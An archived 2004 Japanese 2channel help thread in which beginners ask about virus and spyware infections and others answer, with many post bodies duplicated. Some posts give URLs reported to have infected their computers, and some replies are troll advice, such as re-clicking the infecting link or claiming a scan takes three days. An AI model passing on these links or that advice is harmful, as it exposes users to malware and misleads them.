しかしこの C\WINDOWS\SYSTEM\Kernel.dll は削除してはいけないんですよね。
でもレジストリの感染した値は見つからないし…どうしよう…
あと、削除していて FOLDER.HTTという名前のファイル や 変なhtmlファイル が、フォルダの1つ1つに入りこんでいる
パターンが多かったんですが、その FOLDER.HTT がまだコンピュータ内にちらほら存在していて怖いです。
こんなの感染する前はなかったし…でも表示されなかったし…
ウイルスと同時期に出てきたdesktopとかいうテキストファイルも不気味だ。FOLDER.HTTと必ず一緒にあったし…
458 :ひよこ名無しさん:04/07/26 02:56 ID:FDUxCpwm
spywareってのなんですか?
どなたかおしえてくれませんか・・
どうしよ・・
どなたかおしえてくれませんか・・
どうしよ・・
>>458
ウイルスです。
ウイルスです。
461 :ひよこ名無しさん:04/07/26 03:01 ID:FDUxCpwm
>459
やっぱり・・
ありがとうございます
>460
すいません。何か良い手はあるのでしょうか?
あつかましくてすいません
やっぱり・・
ありがとうございます
>460
すいません。何か良い手はあるのでしょうか?
あつかましくてすいません
>>461
窓の手使え。
窓の手使え。
>>463
チロウ
チロウ
>>464
お前に煽りは無理。
お前に煽りは無理。
466 :ひよこ名無しさん:04/07/26 03:04 ID:FDUxCpwm
>462
ほんとにすいません
ありがとうございます
パソコンの事かなりの無知でして助かります。
ほんとにすいません
ありがとうございます
パソコンの事かなりの無知でして助かります。
スパイウェアと言っても色々あってホント分らんね。ホームページを勝手に書き換えるものとか右クリックメニューに勝手になるものとか
>>465
煽りはスピードが猪木
煽りはスピードが猪木
469 :ひよこ名無しさん:04/07/26 03:09 ID:FDUxCpwm
>467
そうですか。
何回ホームのサイトをヤフーにしても変なのにかわったり
お気に入りにも消しても消してもアダルトサイトのフォルダが
あるんです・・
そうですか。
何回ホームのサイトをヤフーにしても変なのにかわったり
お気に入りにも消しても消してもアダルトサイトのフォルダが
あるんです・・
471 :411=419=427=432=448=453=457:04/07/26 03:12 ID:UVBGSu1s
>>455
Temporary Internet Filesの中からは発見されませんでした。念のためにキャッシュは捨てました。
C\WINDOWS\SYSTEM\Kernel.dllを削除するわけにはいかないし、
感染を示すレジストリの値はみつからないし、
放置したりしたら本格的な被害が始まってしまうし…
どうすればいいでしょうか…?
Temporary Internet Filesの中からは発見されませんでした。念のためにキャッシュは捨てました。
C\WINDOWS\SYSTEM\Kernel.dllを削除するわけにはいかないし、
感染を示すレジストリの値はみつからないし、
放置したりしたら本格的な被害が始まってしまうし…
どうすればいいでしょうか…?
>>471
窓の手使え。
窓の手使え。
>>471
ダメ元でイロイロ試すしかない。
(一番古い日付は不可)
パソコンの電源を入れたら[Ctrl]キーを押しっぱなしにする
“Startup Menu”が表示されたら“Command Prompt Only”(コマンドプロンプトのみ)を選択する
入力可能状態になったら、“scanreg”と入力してから[Enter]キーを押す
日付の一覧が表示されるので、その中で復元したいと思うバックアップデータを選んで[Enter]キーを押す
再起動を求められるので、再起動する
Redlof.A(通称レッドロフ)専用のワクチンソフトです。
http://hp.vector.co.jp/authors/VA029423/winsoft.htm
ダメ元でイロイロ試すしかない。
(一番古い日付は不可)
パソコンの電源を入れたら[Ctrl]キーを押しっぱなしにする
“Startup Menu”が表示されたら“Command Prompt Only”(コマンドプロンプトのみ)を選択する
入力可能状態になったら、“scanreg”と入力してから[Enter]キーを押す
日付の一覧が表示されるので、その中で復元したいと思うバックアップデータを選んで[Enter]キーを押す
再起動を求められるので、再起動する
Redlof.A(通称レッドロフ)専用のワクチンソフトです。
http://hp.vector.co.jp/authors/VA029423/winsoft.htm
474 :411=419=427=432=448=453=457=471:04/07/26 03:34 ID:UVBGSu1s
>>473
こんな夜更けににもかかわらずレスありがとうございます。
>(一番古い日付は不可)
>パソコンの電源を入れたら[Ctrl]キーを押しっぱなしにする
>“Startup Menu”が表示されたら“Command Prompt Only”(コマンドプロンプトのみ)を選択する
>入力可能状態になったら、“scanreg”と入力してから[Enter]キーを押す
>日付の一覧が表示されるので、その中で復元したいと思うバックアップデータを選んで[Enter]キーを押す
>再起動を求められるので、再起動する
わかりました。やってみます。
Redlof.A(通称レッドロフ)専用のワクチンソフトも試してみます。
まだワームらしきものがたくさんあるので。
こんな夜更けににもかかわらずレスありがとうございます。
>(一番古い日付は不可)
>パソコンの電源を入れたら[Ctrl]キーを押しっぱなしにする
>“Startup Menu”が表示されたら“Command Prompt Only”(コマンドプロンプトのみ)を選択する
>入力可能状態になったら、“scanreg”と入力してから[Enter]キーを押す
>日付の一覧が表示されるので、その中で復元したいと思うバックアップデータを選んで[Enter]キーを押す
>再起動を求められるので、再起動する
わかりました。やってみます。
Redlof.A(通称レッドロフ)専用のワクチンソフトも試してみます。
まだワームらしきものがたくさんあるので。
>>471>>474
C\WINDOWS\SYSTEM\Kernel.dll
これは、デフォルトのOSには存在しないファイルだから、削除していいよ。
消してはダメなのは、こっち
C\WINDOWS\SYSTEM\KERNEL32.DLL
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A&VSect=T
・システム改変:
Windowsディレクトリに"WSCRIPT.EXE"がある事を確認すると、Windowsシステムディレクトリに"KERNEL.DLL"のファイル名で自身のコピーを作成します。
"WSCRIPT.EXE"が見つからなかった場合はWindowsディレクトリ\systemに"KERNEL32.DLL"のファイル名で自身のコピーを作成します。これらのファイルは「VBS_REDLOF.A.GEN」の名称で検出されます。
自分で貼ったリンクの詳細の所の記述だよ
C\WINDOWS\SYSTEM\KERNEL32.DLL
スキャンしてウィルス認定されなければ、これは書き替えなくてもいいよ。
C\WINDOWS\SYSTEM\Kernel.dll
これは、デフォルトのOSには存在しないファイルだから、削除していいよ。
消してはダメなのは、こっち
C\WINDOWS\SYSTEM\KERNEL32.DLL
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A&VSect=T
・システム改変:
Windowsディレクトリに"WSCRIPT.EXE"がある事を確認すると、Windowsシステムディレクトリに"KERNEL.DLL"のファイル名で自身のコピーを作成します。
"WSCRIPT.EXE"が見つからなかった場合はWindowsディレクトリ\systemに"KERNEL32.DLL"のファイル名で自身のコピーを作成します。これらのファイルは「VBS_REDLOF.A.GEN」の名称で検出されます。
自分で貼ったリンクの詳細の所の記述だよ
C\WINDOWS\SYSTEM\KERNEL32.DLL
スキャンしてウィルス認定されなければ、これは書き替えなくてもいいよ。
476 :411=419=427=432=448=453=457=471=474:04/07/26 05:15 ID:XpCud9Vv
>>473
Redlof.A(通称レッドロフ)専用のワクチンソフト使いました。
ありがとうございました。
レジストリの感染している部分は直った。と表示されました
>>475
ありがとうございます!!
今まさに「Kernel.dll(感染)って普通に削除しちゃだめですか?」という内容の書きこみをしようとしていたところでした。
すいません…起動に使うフォルダと関連しているので消したらダメだと決め付けていました…。
本当にありがとうございます。
Redlof.A(通称レッドロフ)専用のワクチンソフト使いました。
ありがとうございました。
レジストリの感染している部分は直った。と表示されました
>>475
ありがとうございます!!
今まさに「Kernel.dll(感染)って普通に削除しちゃだめですか?」という内容の書きこみをしようとしていたところでした。
すいません…起動に使うフォルダと関連しているので消したらダメだと決め付けていました…。
本当にありがとうございます。
477 :ひよこ名無しさん:04/07/26 12:14 ID:I6O4w+IW
tp//masaton1900.at.infoseek.co.jp/moemoe.htm
↑↑何かのウィルスだと思うので絶対踏まないで下さい!!
一昨日あたり自分は↑を踏んでしまい何かのウィルスに感染してしまいました。
ですが初心者なので何がおきてるかさっぱりわかりません。
1行目のアドレス(ウィルス)についてわかる方、
是非とも対応や状況説明をアドバイスをお願いします!
↑↑何かのウィルスだと思うので絶対踏まないで下さい!!
一昨日あたり自分は↑を踏んでしまい何かのウィルスに感染してしまいました。
ですが初心者なので何がおきてるかさっぱりわかりません。
1行目のアドレス(ウィルス)についてわかる方、
是非とも対応や状況説明をアドバイスをお願いします!
>>477
ウィルススキャンしろ。
ウィルススキャンしろ。
Unix.Penguin に感染しました。どうしましょう。
482 :ひよこ名無しさん:04/07/26 13:26 ID:t53Ckbxu
483 :477:04/07/26 13:26 ID:I6O4w+IW
>>479
ヤフーで検索してシマンテック、トレンドマイクロ、マカフィーの3つへ行ってみたのですが、ウィルススキャンの項目をクリックしても変化がないというか
画面が全然変わりません。シマンテック、トレンドマイクロの2つは。
マカフィーは
>お申し込み処理中
>
>お待ちください。現在、処理しています。
↑この画面から全く変化がありません。20分以上たった今も…。
ヤフーで検索してシマンテック、トレンドマイクロ、マカフィーの3つへ行ってみたのですが、ウィルススキャンの項目をクリックしても変化がないというか
画面が全然変わりません。シマンテック、トレンドマイクロの2つは。
マカフィーは
>お申し込み処理中
>
>お待ちください。現在、処理しています。
↑この画面から全く変化がありません。20分以上たった今も…。
484 :ひよこ名無しさん:04/07/26 13:29 ID:t53Ckbxu
487 :ひよこ名無しさん:04/07/26 13:36 ID:t53Ckbxu
>>477
店頭で製品版ウイルス駆除ソフトを購入して下さい。
店頭で製品版ウイルス駆除ソフトを購入して下さい。
490 :ひよこ名無しさん:04/07/26 13:38 ID:t53Ckbxu
>>490
Unix.Penguinはイタズラだって言ってるだろ。
Unix.Penguinはイタズラだって言ってるだろ。
492 :ひよこ名無しさん:04/07/26 13:39 ID:t53Ckbxu
>>491
わかりました。ではメールの方は別のウィルスに感染してるってことですか?
わかりました。ではメールの方は別のウィルスに感染してるってことですか?
>>490
次の日本語文を理解しろ。「差出人名の人は全然無関係」
お前の知人がウィルス感染して、ウィルスはそいつのアドレス帳にある
お前の名前を差出人名として使っただけ、ということ。
そうでないばあいもあるけど
次の日本語文を理解しろ。「差出人名の人は全然無関係」
お前の知人がウィルス感染して、ウィルスはそいつのアドレス帳にある
お前の名前を差出人名として使っただけ、ということ。
そうでないばあいもあるけど
495 :ひよこ名無しさん:04/07/26 13:45 ID:t53Ckbxu
496 :ひよこ名無しさん:04/07/26 14:32 ID:Q2zKjoBs
497 :ひよこ名無しさん:04/07/26 14:35 ID:0xAkrDpD
すいません、質問させてもらいます。
僕も>>144氏と同じ状態になってしまったのですが。
ad-awareは前もってインストールできてたので使用できましたけど
これだけでは駆除できなかったみたいです。
で、SPYBOTをインストールしようと試みたのですが
関係のあるサイトを開くとことごとく妨害(?)されてるのかウィンドウが閉じてしまいます。
何度もお気に入り登録させて、やっとのことでダウンロード出来たと思ったら
今度はインストールに失敗しました。と表示されてしまいます。
どーしてなんでしょうか?
僕も>>144氏と同じ状態になってしまったのですが。
ad-awareは前もってインストールできてたので使用できましたけど
これだけでは駆除できなかったみたいです。
で、SPYBOTをインストールしようと試みたのですが
関係のあるサイトを開くとことごとく妨害(?)されてるのかウィンドウが閉じてしまいます。
何度もお気に入り登録させて、やっとのことでダウンロード出来たと思ったら
今度はインストールに失敗しました。と表示されてしまいます。
どーしてなんでしょうか?
498 :ひよこ名無しさん:04/07/26 14:36 ID:Ntdejvdz
普通に完全ウイルススキャンするのと
セーフモードで完全ウイルススキャンするのとでは何が違うのでしょうか?
AVG
セーフモードで完全ウイルススキャンするのとでは何が違うのでしょうか?
AVG
>>496 乙
人が悪いな、
オンラインウイルススキャンのサイトなら、そう書いてくれれば良いのに
一応日本サイトも有るようですが、こちらは製品を売っているだけで
オンラインスキャンサービスは行っていないようね。
http://www.ahnlab.co.jp/
人が悪いな、
オンラインウイルススキャンのサイトなら、そう書いてくれれば良いのに
一応日本サイトも有るようですが、こちらは製品を売っているだけで
オンラインスキャンサービスは行っていないようね。
http://www.ahnlab.co.jp/
501 :ひよこ名無しさん:04/07/26 15:14 ID:0xAkrDpD
>>501
Hacker defender。テンプレにあるか知らんが。ぐぐれ
Hacker defender。テンプレにあるか知らんが。ぐぐれ
503 :412:04/07/26 15:21 ID:SZrvHIuM
自己レス
窓の手・拡張子から行こう♪ My関連付け Ver2.4・[ツール]←[フォルダオプション]からの関連付けなどいろいろ試してみたのですが、
やはり症状は変わらずでした。。
それで症状がでる直前あたりに復元ポイントがあったので、システムの復元を実行し無事に治すことができました。
システムの復元は便利ですね。
レスをくださった方々有難うございました。
窓の手・拡張子から行こう♪ My関連付け Ver2.4・[ツール]←[フォルダオプション]からの関連付けなどいろいろ試してみたのですが、
やはり症状は変わらずでした。。
それで症状がでる直前あたりに復元ポイントがあったので、システムの復元を実行し無事に治すことができました。
システムの復元は便利ですね。
レスをくださった方々有難うございました。
オンラインスキャンをやってみたら
JAVA_BYTEVER...A
というのに感染していました
なんか削除すればいいらしんですが、削除の仕方が分かりません
どーすればいいのでしょうか?
JAVA_BYTEVER...A
というのに感染していました
なんか削除すればいいらしんですが、削除の仕方が分かりません
どーすればいいのでしょうか?
>>505
それは新たなトロイを呼び込むための橋渡しになるような
ウィルスだから実行されてしまえば後の祭りだ。
WindowsUpdateを欠かさずやっていて、アンチウィルスソフトを
導入している人には無関係なウィルスだけどな。IEのキャッシュ
を消せばそのウィルス自体は消えるだろう。
それは新たなトロイを呼び込むための橋渡しになるような
ウィルスだから実行されてしまえば後の祭りだ。
WindowsUpdateを欠かさずやっていて、アンチウィルスソフトを
導入している人には無関係なウィルスだけどな。IEのキャッシュ
を消せばそのウィルス自体は消えるだろう。
>>505
インターネットのキャッシュを削除。
もう一度スキャン。
それでも見つかったら手動でゴミ箱に入れて削除。
その時に見つかった先がSunJavaのテンプレフォルダ
だったら取り合えず感染はない。
次に下のページにいって応急処置を実行して、
スパイウェアを削除する。
エロサイト見たら…助けてください!まとめページ
ttp://haiiro.info/my/text/template.html
インターネットのキャッシュを削除。
もう一度スキャン。
それでも見つかったら手動でゴミ箱に入れて削除。
その時に見つかった先がSunJavaのテンプレフォルダ
だったら取り合えず感染はない。
次に下のページにいって応急処置を実行して、
スパイウェアを削除する。
エロサイト見たら…助けてください!まとめページ
ttp://haiiro.info/my/text/template.html
ちょっと、ダウンロード先がややこしいので
わけわかめになっている人は、このリンクからダウンロードして下さい
SPYBOT
http://www.download.com/3000-2144-10122137.html?part=104443&subj=dlpage&tag=button
Ad-aware
http://www.download.com/3000-2144-10045910.html?part=69274&subj=dlpage&tag=button
わけわかめになっている人は、このリンクからダウンロードして下さい
SPYBOT
http://www.download.com/3000-2144-10122137.html?part=104443&subj=dlpage&tag=button
Ad-aware
http://www.download.com/3000-2144-10045910.html?part=69274&subj=dlpage&tag=button
>>508 偽リンク踏むな
>>509
download.com は、偽リンクじゃ無いだろ。
download.com は、偽リンクじゃ無いだろ。
>ちょっと、ダウンロード先がややこしいので
んなこたあない(AA略
んなこたあない(AA略
>>508は偽リンクじゃないぞ。
>>514
じゃ、ここなら文句ないだろう。Spybotは常にdownload トップ10に入っている。
http://www.filemirrors.com/
Spybot
http://www.filemirrors.com/search.src?type=begins&file=spybotsd13.exe
Ad-aware
http://www.filemirrors.com/search.src?type=begins&file=aaw6181.exe
好きなの落とせ
じゃ、ここなら文句ないだろう。Spybotは常にdownload トップ10に入っている。
http://www.filemirrors.com/
Spybot
http://www.filemirrors.com/search.src?type=begins&file=spybotsd13.exe
Ad-aware
http://www.filemirrors.com/search.src?type=begins&file=aaw6181.exe
好きなの落とせ
>>515
俺は、初心者に説明するときに体験した話をしただけだ。
俺自身は、別に誘導の必要は無いし、元々>>508の相手が
初心者で困るかもしれないという親切心から出た事だろ。
確かに他のスレで、ダウンロード出来ずに困っている奴を
俺も見た事が有るからレスしたまでだ。
ここは初心者を相手にする所だよな。
俺は、初心者に説明するときに体験した話をしただけだ。
俺自身は、別に誘導の必要は無いし、元々>>508の相手が
初心者で困るかもしれないという親切心から出た事だろ。
確かに他のスレで、ダウンロード出来ずに困っている奴を
俺も見た事が有るからレスしたまでだ。
ここは初心者を相手にする所だよな。
518 :ひよこ名無しさん:04/07/26 23:25 ID:fpfsn0eq
519 :ひよこ名無しさん:04/07/27 00:56 ID:6386COJd
オンラインスキャンってどのくらい時間かかりますか?
>>519
はぁ?丸三日かかるよ!
はぁ?丸三日かかるよ!
>>519
そんなん容量と速度に拠りますがな。
そんなん容量と速度に拠りますがな。
522 :ひよこ名無しさん:04/07/27 01:25 ID:6386COJd
容量と速度って何によってわかりますか?
はぁ?
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
>>524
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
>>522
????????????????
????????????????
ご愁傷様です
528 :ひよこ名無しさん:04/07/27 12:00 ID:SgNe+9wW
突然今まで行ってたサイト何件かに行けなくなったんですが、こういうの経験した人います?
アク禁はおろか、移転も閉鎖もしてないんですが・・・・。
アク禁はおろか、移転も閉鎖もしてないんですが・・・・。
やたら落としまくってると向こう側がブロックしてくるんだよ
>>528
( ´_ゝ`)
( ´_ゝ`)
531 :ひよこ名無しさん:04/07/27 16:06 ID:LYD0nZ/d
ページの右上にある「最小化」「最大化」「閉じる」のボタンが「1」「0」「変な記号」になってるんですが、これはウイルスによるものでしょうか?
OSはWIN98です
家族で共有してるので、いつからそうなったかわからないのですが
OSはWIN98です
家族で共有してるので、いつからそうなったかわからないのですが
よむのめんどいです。
教えてください。
教えてください。
さあ次のしつもん来い!!
ここに書いても、読むのめんどうなんだろうな。
536 :ひよこ名無しさん:04/07/27 22:24 ID:0McJjH69
Windows Update を毎日行っている場合でも、ウィルス対策ソフトを導入する必要がありますか?
>>536
当たり前です
当たり前です
538 :ひよこ名無しさん:04/07/27 22:31 ID:0McJjH69
では、ウィルス対策ソフトを導入していれば、Windows Update を実行する必要はありませんか?
>>538
別にしたくないならするなよ。誰も頼んでない。
別にしたくないならするなよ。誰も頼んでない。
540 :ひよこ名無しさん:04/07/27 22:33 ID:0McJjH69
>>539
するメリットがあるか聞きたいのです。
するメリットがあるか聞きたいのです。
>>540
お前みたいな質問してる奴に理解できるとは思えないけどね。
お前みたいな質問してる奴に理解できるとは思えないけどね。
両方必要だが、どちらかといえば、WindowsUpdateのほうが重要
>>538
いつでも再インストール出来るのなら、何にもしなくて良し
いつでも再インストール出来るのなら、何にもしなくて良し
546 :ひよこ名無しさん:04/07/28 02:30 ID:2FCcEYtp
XPユーザーの初心者です。
NAVで更新も最新にしているのですが、
ウイルス警告・コンピュータ上でウイルスを検出しました・高危険度・VBS.Redlof.A・このファイルを修復できません
と出てしまいました。
具具って見ると昔のウイルスらしく、最新の更新がしてあれば問題ないはずなのに・・・?
不安で夜も眠れません(大げさ)。
よろしくご指導ください。
NAVで更新も最新にしているのですが、
ウイルス警告・コンピュータ上でウイルスを検出しました・高危険度・VBS.Redlof.A・このファイルを修復できません
と出てしまいました。
具具って見ると昔のウイルスらしく、最新の更新がしてあれば問題ないはずなのに・・・?
不安で夜も眠れません(大げさ)。
よろしくご指導ください。
ローカルドライブというのは、リムーバブルとDVD以外のやつのことでしょうか?
やってみたら、脅威は見つかりませんと出ますた。
ありがとうございます。
ところで、完全スキャンでも見つからないウイルスとかあるんでしょうか?
心配性なもので・・・。
やってみたら、脅威は見つかりませんと出ますた。
ありがとうございます。
ところで、完全スキャンでも見つからないウイルスとかあるんでしょうか?
心配性なもので・・・。
>>549
もちろんあるよ。
もちろんあるよ。
ベンダーサイト---->ベンダーサイド
新しいウイルスでも亜種だったら素通しってことにはならんのかね?
>>554もちろんそうよ。
556 :ひよこ名無しさん:04/07/28 11:59 ID:tKgi1PAi
ウィルスなのか不明ですがCGIゲーにログインしようとするとパスが消されます。
あと、英単語に勝手にどっかの検索サイトにリンク引かれます。
どういった症状なんでしょうか?
フレームなんかも表示されずに消えます。
初心者スレに書いてこっちに書けばよかったと気付く漏れ。
あと、英単語に勝手にどっかの検索サイトにリンク引かれます。
どういった症状なんでしょうか?
フレームなんかも表示されずに消えます。
初心者スレに書いてこっちに書けばよかったと気付く漏れ。
>>556
マルチ死ね
マルチ死ね
558 :ひよこ名無しさん:04/07/28 12:03 ID:HpF9h+2E
【オンライン3DFPSサッカー】
無料なので是非プレイしてみてください
かなり面白いですよ!!
公式ページ
ttp://210.166.209.16/dreamcup.htm
操作説明
ttp://dreamcop.fc2web.com/index.htm
本スレはこちら
http://game8.2ch.net/test/read.cgi/netgame/1090912460/
無料なので是非プレイしてみてください
かなり面白いですよ!!
公式ページ
ttp://210.166.209.16/dreamcup.htm
操作説明
ttp://dreamcop.fc2web.com/index.htm
本スレはこちら
http://game8.2ch.net/test/read.cgi/netgame/1090912460/
559 :ひよこ名無しさん:04/07/28 17:57 ID:wVf0XKyZ
2ちゃんのスレを開いたらノートン先生が反応してびっくり。
どうやってウィルスを仕込んでるんでしょう?
どうやってウィルスを仕込んでるんでしょう?
>>559
コピペしてるだけだ気にすんな
コピペしてるだけだ気にすんな
たいていの異常はアドウエアで片付くんですが、今回のはかなり
しぶとく、ウイルスバスター使っても、セーフモードにしてから
アドウエア使っても直りません。どうしたらいんでしょう。
しぶとく、ウイルスバスター使っても、セーフモードにしてから
アドウエア使っても直りません。どうしたらいんでしょう。
__
_____( ()
| ∧_∧ |  ̄ ̄
/\(´・ω・`) | ネムレニャイ
//\\ つ
// \\_ ヽ |
// //(_)|
\\ // |
\\// ̄ ̄ ̄
\/
_____( ()
| ∧_∧ |  ̄ ̄
/\(´・ω・`) | ネムレニャイ
//\\ つ
// \\_ ヽ |
// //(_)|
\\ // |
\\// ̄ ̄ ̄
\/
寝言か。
565 :ひよこ名無しさん:04/07/28 23:53 ID:kJpQFbP7
ttp://www.alladultjapan.net/BBS_L/IMG/BOX/img20040727062937.jpg
を間違えて踏んでしまいました。
そしたらウイルスに感染したみたいなんです。
どうやったら直るかわからないので、教えていただけないでしょうか?
よろしくお願いいたします。
を間違えて踏んでしまいました。
そしたらウイルスに感染したみたいなんです。
どうやったら直るかわからないので、教えていただけないでしょうか?
よろしくお願いいたします。
アンチウイルスソフトをお買い上げください。
567 :ひよこ名無しさん:04/07/29 00:04 ID:THZy5gdT
ウイルスバスターで
最新版にアップデイトしてもダメでつ
最新版にアップデイトしてもダメでつ
>>567
システムの復元を試せ。
システムの復元を試せ。
569 :ひよこ名無しさん:04/07/29 00:39 ID:eIb1lBE7
ようやくウイルスバスター他セキュリティソフトを導入することになったのですが
それまでは全くの無防備で
ネットに接続しているときに、まれに画面右下タスクバーの接続アイコン(モニターのマーク)が
何も読み込んでいないのに点灯することが何度もありました。そのときはISDNで、ルーターは無しです。
これは何かを送受信していたということでしょうか。バナー広告等は無いページでした。
一応ウイルススキャンでは異常なし、スパイウェアも無かったのですが…
この状態は普通に起こりうるのでしょうか。
それまでは全くの無防備で
ネットに接続しているときに、まれに画面右下タスクバーの接続アイコン(モニターのマーク)が
何も読み込んでいないのに点灯することが何度もありました。そのときはISDNで、ルーターは無しです。
これは何かを送受信していたということでしょうか。バナー広告等は無いページでした。
一応ウイルススキャンでは異常なし、スパイウェアも無かったのですが…
この状態は普通に起こりうるのでしょうか。
570 :ぼるじょあ ◆yBEncckFOU :04/07/29 00:45 ID:???
571 :ひよこ名無しさん:04/07/29 00:47 ID:f1TplmYp
ttp://www.border.jp/uploader/img/8978.jpg
これ踏んだら変なのがインストールされました。
そして、それを削除して再起動したらアイコンが全部消えてしまいました。
今ネットカフェからでどうにもならない状態です。
エロい人助けて!
これ踏んだら変なのがインストールされました。
そして、それを削除して再起動したらアイコンが全部消えてしまいました。
今ネットカフェからでどうにもならない状態です。
エロい人助けて!
>>571
窓の手使え。
窓の手使え。
573 :ひよこ名無しさん:04/07/29 07:24 ID:GNSIzV56
www.stylite.net/sida-aids-php/ph%20ptx%20048.jpg
これを踏んでしまいました。。。
もうどうしようもないですか。。。
これを踏んでしまいました。。。
もうどうしようもないですか。。。
574 :シャープに訣別:04/07/29 07:32 ID:BLbVWeoJ
シャープのエアコンを買う前にお読みください
2年間の間に3台のトラブル。
品質も修理サービスの質ともに最低。
本社と現場営業所との連携もチグハグ。
クレーム発生時の適切な対処期待できません。
http://www.e-horita.net/SHARP/
575 :ひよこ名無しさん:04/07/29 10:24 ID:ZOpeE5bN
IEが開けないんです… 何回かクリックしてると
「メモリーが不足しています。いくつかのプログラムを終了してから−」
が表示されす。
ウィルスをスキャンしてもみつかりません。 教えてください
「メモリーが不足しています。いくつかのプログラムを終了してから−」
が表示されす。
ウィルスをスキャンしてもみつかりません。 教えてください
フウン
>>575
スパイウェア
スパイウェア
578 :ひよこ名無しさん:04/07/29 12:03 ID:ZOpeE5bN
575です。ありがとうございます。
スパイウェアを駆除するソフトは量販店で購入できますか?
スパイウェアを駆除するソフトは量販店で購入できますか?
>>578
お客さん一人ご案内
お客さん一人ご案内
風俗の呼び込みみたいですねw
ありがとうございました。 行ってきます
>>575
ただのリソース不足では?
ただのリソース不足では?
オンラインスキャンしたらウィルスがものすごくたくさんファイル作ってたので、
面倒くさいからリセットしてしまいたいんですけど、
そういうときって再セットアップでいいんですか?それともOS再インストール?
ファイルはCだけにあるみたいです
面倒くさいからリセットしてしまいたいんですけど、
そういうときって再セットアップでいいんですか?それともOS再インストール?
ファイルはCだけにあるみたいです
587 :ひよこ名無しさん:04/07/29 19:13 ID:0Q2gFrFF
ごめんなさい、ID出しました。
再セットアップ→アプリケーション
OS→全部
違うんですか?
再セットアップ→アプリケーション
OS→全部
違うんですか?
589 :ひよこ名無しさん:04/07/29 19:24 ID:0Q2gFrFF
では、再セットアップをすればシステムファイルから全て
入れなおせるって事ですか?
入れなおせるって事ですか?
>>587
その辺は、適当に検索して自分で理解した方がいいよ。
、、、で、
全部入れ直すなら、それが一番確実。
大事なデータをバックアップして(ウイルスチェック忘れるな)から
クリーンインストールしろ。
その辺は、適当に検索して自分で理解した方がいいよ。
、、、で、
全部入れ直すなら、それが一番確実。
大事なデータをバックアップして(ウイルスチェック忘れるな)から
クリーンインストールしろ。
591 :ひよこ名無しさん:04/07/29 20:51 ID:c8dNLjpJ
今再セットアップしたのですが…
Dドライブの名前がLANNAVI180ってなっててなぞです。
これはウィルス関係あるんでしょうか?
ちなみに今10000ファイルくらい検索した中で感染はまだ0です
Dドライブの名前がLANNAVI180ってなっててなぞです。
これはウィルス関係あるんでしょうか?
ちなみに今10000ファイルくらい検索した中で感染はまだ0です
593 :ひよこ名無しさん:04/07/29 21:34 ID:KBdiPUVA
594 :ひよこ名無しさん:04/07/29 22:44 ID:/76WmJR5
かなり悪質なウィルスで困っています。
2ちゃんねるでリンク先を踏んでしまったのが原因ですが、
パソコンを立ち上げるたびにデスクトップにSEXというショートカットが現れ、
勝手にIEが起動して、エロサイトに飛んでしまいます
それで英語で「パソコンの動作が遅くなっていないか?
なおしたければカネ払え」みたいなメッセージをきいてきます・・・
他のサイトを見ているときも、突然、同じような現象がおきます。
ウイルスバスターでもスルーされてしまうし、
窓の手で自動実行を削除しても無理です・・・
どうすればいいのでしょうか m(_ _)mよろしくお願いします。
2ちゃんねるでリンク先を踏んでしまったのが原因ですが、
パソコンを立ち上げるたびにデスクトップにSEXというショートカットが現れ、
勝手にIEが起動して、エロサイトに飛んでしまいます
それで英語で「パソコンの動作が遅くなっていないか?
なおしたければカネ払え」みたいなメッセージをきいてきます・・・
他のサイトを見ているときも、突然、同じような現象がおきます。
ウイルスバスターでもスルーされてしまうし、
窓の手で自動実行を削除しても無理です・・・
どうすればいいのでしょうか m(_ _)mよろしくお願いします。
>>594
エロサイトスレのテンプレを実行。
エロサイトスレのテンプレを実行。
>>594
同じとこもう一回踏めよ。直る。
同じとこもう一回踏めよ。直る。
597 :ひよこ名無しさん:04/07/29 22:50 ID:/76WmJR5
>>595
ありがとうございます。やってみます。
ありがとうございます。やってみます。
598 :ひよこ名無しさん:04/07/30 00:42 ID:xT64i0mp
トロイの木馬型?ウイルスとも違ってそうなんですが、変な物が入り込んでしまって困っています。
当方、WinXP Proです。
C:\WINDOWS\System32\wingkpc.dll
というファイルが原因だということは、ノートン・ウイルスセキュリティを使ってわかりましたが、駆除できません。
ノートンでダメで、動作が重くなった(以前よりますます重くなった感が強かった)ためにアンインストールし、ウイルスセキュリティ(ソースネクスト)を買ってスキャンなど試みましたがダメでした。
セーフモードで起動する、
Ad-awareをインストールしてスキャンする、等を試してもまだ残っています。
自分、某オンラインゲームをしてますが、ゲーム中でもウイルスセキュリティの警告が出ることがあり、全画面モードが失われたことにより中断さえしてしまいます。
OSのクリーンインストールしか道は残ってないのでしょうか?よろしくお願いします。
当方、WinXP Proです。
C:\WINDOWS\System32\wingkpc.dll
というファイルが原因だということは、ノートン・ウイルスセキュリティを使ってわかりましたが、駆除できません。
ノートンでダメで、動作が重くなった(以前よりますます重くなった感が強かった)ためにアンインストールし、ウイルスセキュリティ(ソースネクスト)を買ってスキャンなど試みましたがダメでした。
セーフモードで起動する、
Ad-awareをインストールしてスキャンする、等を試してもまだ残っています。
自分、某オンラインゲームをしてますが、ゲーム中でもウイルスセキュリティの警告が出ることがあり、全画面モードが失われたことにより中断さえしてしまいます。
OSのクリーンインストールしか道は残ってないのでしょうか?よろしくお願いします。
599 :ひよこ名無しさん:04/07/30 00:49 ID:x0iZcqIj
OSはWinXP、IE6です。
ウィルスバスター入れてます。
さっきからやたらと
MS04-011_LSASS_VULNERABILITY
RPC_DCOM_BUFFER_OVERFLOW
この二つが緊急警告として出てくるんですけど、
どうしたらよいのでしょうか?
MS04-011_LSASS_VULNERABILITYについてはリンク先のマイクロソフトのページで
Microsoft Windows XP、Microsoft Windows XP Service Pack 1
というのをインストールしてみましたが変わりません。
RPC_DCOM_BUFFER_OVERFLOWというのは英語なのでさっぱりわかりません…。
アドバイスお願いします。
ウィルスバスター入れてます。
さっきからやたらと
MS04-011_LSASS_VULNERABILITY
RPC_DCOM_BUFFER_OVERFLOW
この二つが緊急警告として出てくるんですけど、
どうしたらよいのでしょうか?
MS04-011_LSASS_VULNERABILITYについてはリンク先のマイクロソフトのページで
Microsoft Windows XP、Microsoft Windows XP Service Pack 1
というのをインストールしてみましたが変わりません。
RPC_DCOM_BUFFER_OVERFLOWというのは英語なのでさっぱりわかりません…。
アドバイスお願いします。
